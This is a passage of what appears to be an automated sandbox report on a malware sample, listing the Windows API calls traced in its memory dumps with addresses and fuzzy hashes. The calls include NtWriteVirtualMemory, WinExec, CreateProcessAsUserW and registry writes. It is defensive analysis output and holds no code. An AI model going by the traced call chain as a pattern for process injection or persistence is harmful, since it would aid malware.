                                                                                                                                                                          • Opcode Fuzzy Hash: 11a252525ce8d5da872f96644ff934cc2c984a07bae34841f1361200094bd8c5
                                                                                                                                                                          • Instruction Fuzzy Hash: 2741F835B1020C9FEB00FBA5D881E9EB7FAEFC8710F215475EA51A7284EA70AD018F50

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                          • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1543721669-0
                                                                                                                                                                          • Opcode ID: a81f288f4c0bcc5914ff66cc18760187e9ec8210bcafa05b9b331596930f4d19
                                                                                                                                                                          • Instruction ID: 437e55626390bae889ae2882933da56954c55d2f0ef777ff74173a8535b786e7
                                                                                                                                                                          • Opcode Fuzzy Hash: a81f288f4c0bcc5914ff66cc18760187e9ec8210bcafa05b9b331596930f4d19
                                                                                                                                                                          • Instruction Fuzzy Hash: EF114F70E4430DAFE700FBE8CC89E6E77EDABC5B00F510464BA04AB6C0DB7899109B54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02918660
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                          • Opcode ID: 137ae62c6f57625fccb6145cdaa947f0330378072a8ccb46e7c7c20f68fd1931
                                                                                                                                                                          • Instruction ID: c41f1de19a2fd282900c0de8991ba475c04996fbf336a4bfd39cb7601c47ab07
                                                                                                                                                                          • Opcode Fuzzy Hash: 137ae62c6f57625fccb6145cdaa947f0330378072a8ccb46e7c7c20f68fd1931
                                                                                                                                                                          • Instruction Fuzzy Hash: 0111D3B1A4420CAFEB40EFA9DD81F9A37EDFB8CB50F514554FA08D7280D634E9109B64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02918470
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                          • Opcode ID: 4ebf7a966b31e89c6ceffef88034489c72a4f8e44de253d02abba6b50a6ffb3c
                                                                                                                                                                          • Instruction ID: 6003c64ef0c8061847387e4c59112c7a2d3931c869c9c9558772f630b9a5e019
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ebf7a966b31e89c6ceffef88034489c72a4f8e44de253d02abba6b50a6ffb3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D016D34A4420CBFFB10EBA5DC86F6A77EDF789B10F518860FA04D66C0DA34A9109A64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • WinExec.KERNEL32(?,?), ref: 02918470
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$Exec
                                                                                                                                                                          • String ID: Kernel32$WinExec
                                                                                                                                                                          • API String ID: 2292790416-3609268280
                                                                                                                                                                          • Opcode ID: ad6a28fa98a00e5da742d92bf8de265122ba5fcba479fa78f0759b03502d746e
                                                                                                                                                                          • Instruction ID: 3bc4ca0fe8229b8d50c3d51cec850e7bd7ac8abe7384f4a3f6c461d21ddcd755
                                                                                                                                                                          • Opcode Fuzzy Hash: ad6a28fa98a00e5da742d92bf8de265122ba5fcba479fa78f0759b03502d746e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF08134A4420CBFFB10EFA5DC86F5A77EDF789B10F518860FA04D76C0DA34A9109A64
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CF4,?,?,02913880,00000001), ref: 02915C08
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02915CF4,?,?,02913880,00000001), ref: 02915C36
                                                                                                                                                                            • Part of subcall function 02907D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02913880,02915C76,00000000,02915CF4,?,?,02913880), ref: 02907D5E
                                                                                                                                                                            • Part of subcall function 02907F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02913880,02915C91,00000000,02915CF4,?,?,02913880,00000001), ref: 02907F37
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,02915CF4,?,?,02913880,00000001), ref: 02915C9B
                                                                                                                                                                            • Part of subcall function 0290A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0290C359,00000000,0290C3B3), ref: 0290A717
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 503785936-0
                                                                                                                                                                          • Opcode ID: 8a56c611ef4a86a867912a4696e1b2ced10914ebb410535f461ade0b4f330461
                                                                                                                                                                          • Instruction ID: 57c87a81e8e3f3263e44e43251ebc26d265a5b6f7623bc5f92090318e3dfd9d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a56c611ef4a86a867912a4696e1b2ced10914ebb410535f461ade0b4f330461
                                                                                                                                                                          • Instruction Fuzzy Hash: 03317030A0430D9FEB00EFA9C8C1BAEB7F6AF88714F918465E514AB3C0D7755A058FA5
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A56914), ref: 0291EB38
                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB70
                                                                                                                                                                          • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB7B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                          • Opcode ID: 34d3fe8a15374b5e3e0373d16875fb1b297ad8d96aed0afa876999345fe8af85
                                                                                                                                                                          • Instruction ID: 3dd0a5a2530e14ffe6efda6464855b5f97d029f89791a44bb8fd045f5d4e05c4
                                                                                                                                                                          • Opcode Fuzzy Hash: 34d3fe8a15374b5e3e0373d16875fb1b297ad8d96aed0afa876999345fe8af85
                                                                                                                                                                          • Instruction Fuzzy Hash: 09110071A40208AFEB00EBA9DCC1D6E77EDEB89B10F900574B905D7290DB30DE519E60
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,02A56914), ref: 0291EB38
                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB70
                                                                                                                                                                          • RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,0291EBA3), ref: 0291EB7B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                          • Opcode ID: 107de584be8298f20696a4795bfaf4a8bdb8fb38b79581eab943760ced89793a
                                                                                                                                                                          • Instruction ID: 39bcc3a11f86d2999657ac3a9cdc519f195c328163f8581469aa88ec64f5c31e
                                                                                                                                                                          • Opcode Fuzzy Hash: 107de584be8298f20696a4795bfaf4a8bdb8fb38b79581eab943760ced89793a
                                                                                                                                                                          • Instruction Fuzzy Hash: A2110071A40208AFDB00EBA5DCC1D6E77EDEB89B10F900574B505D7290DB30DA519E60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                          • Opcode ID: 82e3558b8079410e70c8f5aebe8fd769fe37cc2779b355b3248167739cd4bd10
                                                                                                                                                                          • Instruction ID: b0f12b5b0f945d60c4762c02b78ff8019d22b2bce9b06b72b14637e493f9d567
                                                                                                                                                                          • Opcode Fuzzy Hash: 82e3558b8079410e70c8f5aebe8fd769fe37cc2779b355b3248167739cd4bd10
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF06D62B0821CDFDB247B3989C466A7B9A9F84B107545C76E48A9B2C5CB248C09CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02904D07
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02904D19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                          • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                                                          • Instruction ID: 8b67a57fbc6c7ec48a5d40111e49c217558c954690177aba91b04e6ff6698f20
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                                                          • Instruction Fuzzy Hash: D0E012B81052095EFB142F259DC0B3B372EAFC5B41B145899BA04CA1D0D734C841AD34
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0291735A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                          • Opcode ID: 0365c794c70df76bbb00f99ca3c830eded84efd1ad6435abf03f45c07beaf3dc
                                                                                                                                                                          • Instruction ID: a3f1456f017618556af209ee85e2fe294f47ad53db0c0b78527503394eca6bc0
                                                                                                                                                                          • Opcode Fuzzy Hash: 0365c794c70df76bbb00f99ca3c830eded84efd1ad6435abf03f45c07beaf3dc
                                                                                                                                                                          • Instruction Fuzzy Hash: CBB1D174A01609EFDB14CF9AE580A9DFBF6FF89314F248569E805AB364D730A846CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 0290E701
                                                                                                                                                                            • Part of subcall function 0290E2E4: VariantClear.OLEAUT32(?), ref: 0290E2F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                          • Opcode ID: 5e3b115fa01f953385c03d0c8794f07cf48e7df91ace0ad61fa425945c6b844f
                                                                                                                                                                          • Instruction ID: 73af3a8fd009edae0ea3d78a9a5ec99465ddb28119de42e184dc814a89f9c77f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e3b115fa01f953385c03d0c8794f07cf48e7df91ace0ad61fa425945c6b844f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8A11A92170421C9FCB34AF69D9C4A6B77DBEF857507045C26E6CA8B2C5DB30EC40C661
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                          • Opcode ID: 8c922e6f859ddca18fb61c8354f1c00d893a5ca7acea21f5a65a890989455e5e
                                                                                                                                                                          • Instruction ID: 3df708ecd6eaef89bf6753d25b50e35cf3b53a4acadfa8066d61a6655d64541d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c922e6f859ddca18fb61c8354f1c00d893a5ca7acea21f5a65a890989455e5e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C314D72A0421CAFDB14DFA8C8C4AAA7BEDEB4C304F444D66F989D3280D330D990CB65
                                                                                                                                                                          APIs
                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02916D39,?,?,?,00000000), ref: 02916D19
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                           • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                                                          • Opcode ID: ebb9d4239e6fe4bdaa5f2f8d4079ef8e0feb3a0273d64978b6b13534e2e969a6
                                                                                                                                                                          • Instruction ID: 069cf607e512eaed28de4d427ff67a6fafb6c343cb10535913063063e4915d36
                                                                                                                                                                          • Opcode Fuzzy Hash: ebb9d4239e6fe4bdaa5f2f8d4079ef8e0feb3a0273d64978b6b13534e2e969a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FE06D75A1430CBFE711EBA6CC9299A77EDDFC9B10B510475AA00D7680EA75AE0098A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 02905832
                                                                                                                                                                            • Part of subcall function 02905A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02900000,0292E790), ref: 02905A94
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AB2
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02900000,0292E790), ref: 02905AD0
                                                                                                                                                                            • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                                                                                                                            • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                                                                                                                            • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                                                                                                                            • Part of subcall function 02905A78: RegCloseKey.ADVAPI32(?,02905B84,00000000,?,?,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                           • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
